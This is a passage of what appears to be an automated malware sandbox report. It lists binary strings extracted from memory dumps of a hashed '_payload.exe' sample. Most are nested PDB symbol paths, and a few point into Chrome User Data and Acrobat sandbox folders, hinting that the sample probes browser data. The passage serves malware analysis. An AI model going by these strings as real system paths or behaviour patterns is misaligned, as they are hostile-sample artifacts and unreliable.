baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000003.2246411103.00000000042D6000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\Local Settings\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\download.error? source: baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000003.2246153971.00000000042CA000.00000004.00000020.00020000.00000000.sdmp, baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000003.2245622886.0000000004281000.00000004.00000020.00020000.00000000.sdmp, baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000003.2244362198.0000000004281000.00000004.00000020.00020000.00000000.sdmp, baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000003.2220761760.0000000004281000.00000004.00000020.00020000.00000000.sdmp, baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000003.2246064156.000000000429E000.00000004.00000020.00020000.00000000.sdmp, baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000003.2246411103.00000000042D6000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\Local Settings\Temp\Symbols\ntkrnlmp.pdb\bat\ source: baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000003.2220728599.0000000003CC9000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Users\user\Local Settings\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\winload_prod.pdb.vapo+ source: baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000003.2220259603.00000000041F7000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\Local Settings\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\} source: baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000003.2220761760.0000000004281000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\Local Settings\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\{ source: baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000003.2220761760.0000000004281000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\a\ source: baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000003.2289217814.0000000003CFB000.00000004.00000020.00020000.00000000.sdmp, baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000003.2288830631.0000000003CD1000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\.pdb\ source: baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000003.2320944072.00000000042C9000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\Local Settings\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\q source: baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000003.2220761760.0000000004281000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\wy\ Data source: baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000002.2330904102.000000000136A000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Packages\Microsoft.Win32WebViewHost_cw5n1h2txyewy\AppData\ation Data\Temp\Symbols\winload_prod.pdb\we\tetz{ source: baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000003.2304875580.00000000041E3000.00000004.00000020.00020000.00000000.sdmp, baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000003.2304461865.00000000041A8000.00000004.00000020.00020000.00000000.sdmp, baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000003.2305780376.00000000041EF000.00000004.00000020.00020000.00000000.sdmp, baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000003.2288915602.0000000004171000.00000004.00000020.00020000.00000000.sdmp, baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000003.2289842749.0000000004191000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\\_ source: baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000003.2314858413.00000000041FB000.00000004.00000020.00020000.00000000.sdmp, baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000003.2309490002.00000000041FB000.00000004.00000020.00020000.00000000.sdmp, baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000003.2309043615.00000000041B0000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\Local Settings\Temp\Symbols\ntkrnlmp.pdb\ta\ source: baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000003.1969857893.0000000003CC8000.00000004.00000020.00020000.00000000.sdmp, baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000003.1969596847.0000000003CC2000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\y6 source: baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000003.2287934159.00000000044D3000.00000004.00000020.00020000.00000000.sdmp, baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000003.2305412296.00000000044EB000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\ source: baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000003.2316052505.000000000419F000.00000004.00000020.00020000.00000000.sdmp, baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000003.2309670464.000000000419D000.00000004.00000020.00020000.00000000.sdmp, baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000003.2309087828.000000000419A000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\Local Settings\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\pCl source: baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000003.2220922049.0000000003D27000.00000004.00000020.00020000.00000000.sdmp, baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000003.2020128101.0000000003D19000.00000004.00000020.00020000.00000000.sdmp, baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000003.2019336815.0000000003D05000.00000004.00000020.00020000.00000000.sdmp, baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000003.2220484967.0000000003D11000.00000004.00000020.00020000.00000000.sdmp, baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000003.2020095647.0000000003D15000.00000004.00000020.00020000.00000000.sdmp, baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000003.2019923625.0000000003D0D000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Users\user\Local Settings\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\winload_prod.pdb source: baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000003.2220586448.0000000003D01000.00000004.00000020.00020000.00000000.sdmp, baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000003.2220855829.0000000003D07000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\Local Settings\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\download.errorogFile_October_3_2023__13_9_20.txt source: baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000003.2220922049.0000000003D27000.00000004.00000020.00020000.00000000.sdmp, baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000003.2220484967.0000000003D11000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\Local Settings\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\ source: baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000003.2220761760.0000000004281000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\ source: baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000003.2309699551.0000000003CA4000.00000004.00000020.00020000.00000000.sdmp, baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000003.2310492810.0000000003CAE000.00000004.00000020.00020000.00000000.sdmp, baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000003.2305412296.000000000454A000.00000004.00000020.00020000.00000000.sdmp, baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000003.2305085641.0000000003CA4000.00000004.00000020.00020000.00000000.sdmp, baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000003.2304545377.000000000454A000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Packages\c5e2524a-ea46-4f67-841f-6a9465d9d515_cw5n1h2txyewy\LocalCache\yewy\load_prod.pdb\U" source: baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000003.2269073455.000000000415B000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\ft.Wi source: baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000003.2288881573.0000000003D38000.00000004.00000020.00020000.00000000.sdmp, baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000003.2279635159.0000000003D06000.00000004.00000020.00020000.00000000.sdmp, baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000003.2280141938.0000000003D15000.00000004.00000020.00020000.00000000.sdmp, baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000003.2288254715.0000000003D1A000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\\ source: baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000003.2269368063.0000000004199000.00000004.00000020.00020000.00000000.sdmp, baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000003.2268652417.0000000004181000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\a\\ source: baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000003.2325989468.0000000004682000.00000004.00000020.00020000.00000000.sdmp, baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000003.2328255306.000000000468A000.00000004.00000020.00020000.00000000.sdmp, baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000002.2333695957.000000000468A000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\Local Settings\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\e\ source: baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000003.2220922049.0000000003D27000.00000004.00000020.00020000.00000000.sdmp, baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000003.2020128101.0000000003D19000.00000004.00000020.00020000.00000000.sdmp, baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000003.2019336815.0000000003D05000.00000004.00000020.00020000.00000000.sdmp, baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000003.2220484967.0000000003D11000.00000004.00000020.00020000.00000000.sdmp, baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000003.2020095647.0000000003D15000.00000004.00000020.00020000.00000000.sdmp, baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000003.2019923625.0000000003D0D000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\acrord32_super_sbx\Adobe\Acrobat\DC\.pdb\gM source: baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000003.2325989468.0000000004682000.00000004.00000020.00020000.00000000.sdmp, baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000003.2328255306.000000000468A000.00000004.00000020.00020000.00000000.sdmp, baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000003.2328365004.00000000046AB000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\ source: baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000003.2281607594.0000000004555000.00000004.00000020.00020000.00000000.sdmp, baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000003.2289409280.000000000451B000.00000004.00000020.00020000.00000000.sdmp, baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000003.2289789240.0000000004543000.00000004.00000020.00020000.00000000.sdmp, baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000003.2287934159.000000000451A000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\te\0 source: baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000003.2288044780.0000000004301000.00000004.00000020.00020000.00000000.sdmp, baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000003.2278810719.00000000042F5000.00000004.00000020.00020000.00000000.sdmp, baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000003.2280863089.00000000042F5000.00000004.00000020.00020000.00000000.sdmp, baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000003.2288336972.000000000430A000.00000004.00000020.00020000.00000000.sdmp, baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000003.2282294702.00000000042FE000.00000004.00000020.00020000.00000000.sdmp, baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000003.2289471959.0000000004311000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\63\ source: baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000003.2316636739.0000000004642000.00000004.00000020.00020000.00000000.sdmp, baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000003.2315665397.0000000004642000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\om source: baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000003.2289371112.00000000042A4000.00000004.00000020.00020000.00000000.sdmp, baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000003.2304731023.00000000042A0000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\e\e\u source: baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000003.2314858413.00000000041FB000.00000004.00000020.00020000.00000000.sdmp, baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000003.2309490002.00000000041FB000.00000004.00000020.00020000.00000000.sdmp, baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000003.2309043615.00000000041B0000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Users\user\Local Settings\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\download.error.vapo* source: baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000003.2220761760.0000000004281000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\Local Settings\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\ntkrnlmp.pdb/ source: baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000003.2220619290.0000000003CDA000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\Local Settings\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\ry\ source: baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000003.2220761760.0000000004281000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\\a\<o source: baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000003.2316052505.000000000419F000.00000004.00000020.00020000.00000000.sdmp, baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000003.2309670464.000000000419D000.00000004.00000020.00020000.00000000.sdmp, baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000003.2309087828.000000000419A000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\CH source: baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000003.2304673578.000000000455B000.00000004.00000020.00020000.00000000.sdmp, baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000003.2289409280.000000000451B000.00000004.00000020.00020000.00000000.sdmp, baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000003.2289789240.0000000004543000.00000004.00000020.00020000.00000000.sdmp, baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000003.2287934159.000000000451A000.00000004.00000020.00020000.00000000.sdmp, baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000003.2304545377.000000000454A000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\Local Settings\Temp\Symbols\winload_prod.pdb\* source: baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000003.1969857893.0000000003CC8000.00000004.00000020.00020000.00000000.sdmp, baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000003.1969596847.0000000003CC2000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\\ source: baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000003.2289329759.0000000004202000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\} source: baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000003.2279327675.0000000004211000.00000004.00000020.00020000.00000000.sdmp, baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000003.2281094654.0000000004211000.00000004.00000020.00020000.00000000.sdmp, baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000003.2268241240.0000000004203000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\e\ICE source: baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000003.2220922049.0000000003D27000.00000004.00000020.00020000.00000000.sdmp, baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000003.2220484967.0000000003D11000.00000004.00000020.00020000.00000000.sdmp, baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000003.2244916554.0000000003D1B000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\BjA source: baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000003.2310310548.0000000004323000.00000004.00000020.00020000.00000000.sdmp, baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000003.2308898477.000000000431A000.00000004.00000020.00020000.00000000.sdmp, baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000003.2304397564.000000000431A000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\ source: baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000003.2268241240.0000000004312000.00000004.00000020.00020000.00000000.sdmp, baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000003.2278810719.00000000042F5000.00000004.00000020.00020000.00000000.sdmp, baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000003.2271174046.0000000004312000.00000004.00000020.00020000.00000000.sdmp, baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000003.2279774286.0000000004343000.00000004.00000020.00020000.00000000.sdmp, baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000003.2244362198.000000000433C000.00000004.00000020.00020000.00000000.sdmp, baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000003.2271963806.0000000004323000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\nes\L3 source: baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000003.2220619290.0000000003CDA000.00000004.00000020.00020000.00000000.sdmp, baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000003.2245981120.0000000003CE7000.00000004.00000020.00020000.00000000.sdmp, baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000003.2245017706.0000000003CDC000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\ source: baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000003.2272328105.0000000004177000.00000004.00000020.00020000.00000000.sdmp, baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000003.2269305125.000000000416F000.00000004.00000020.00020000.00000000.sdmp, baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000003.2269073455.000000000415B000.00000004.00000020.00020000.00000000.sdmp, baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000003.2244964075.000000000416B000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\\ source: baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000003.2245575111.0000000004199000.00000004.00000020.00020000.00000000.sdmp, baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000003.2244362198.0000000004181000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\o**\ source: baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000003.2246153971.00000000042CA000.00000004.00000020.00020000.00000000.sdmp, baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000003.2245622886.0000000004281000.00000004.00000020.00020000.00000000.sdmp, baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000003.2244362198.0000000004281000.00000004.00000020.00020000.00000000.sdmp, baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000003.2246064156.000000000429E000.00000004.00000020.00020000.00000000.sdmp, baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000003.2246411103.00000000042D6000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Users\user\Local Settings\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\download.error\* source: baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000003.2220586448.0000000003D01000.00000004.00000020.00020000.00000000.sdmp, baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000003.2220855829.0000000003D07000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: .LOGUser.datntkrnlmp.pdb source: baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000003.2220259603.00000000041F7000.00000004.00000020.00020000.00000000.sdmp
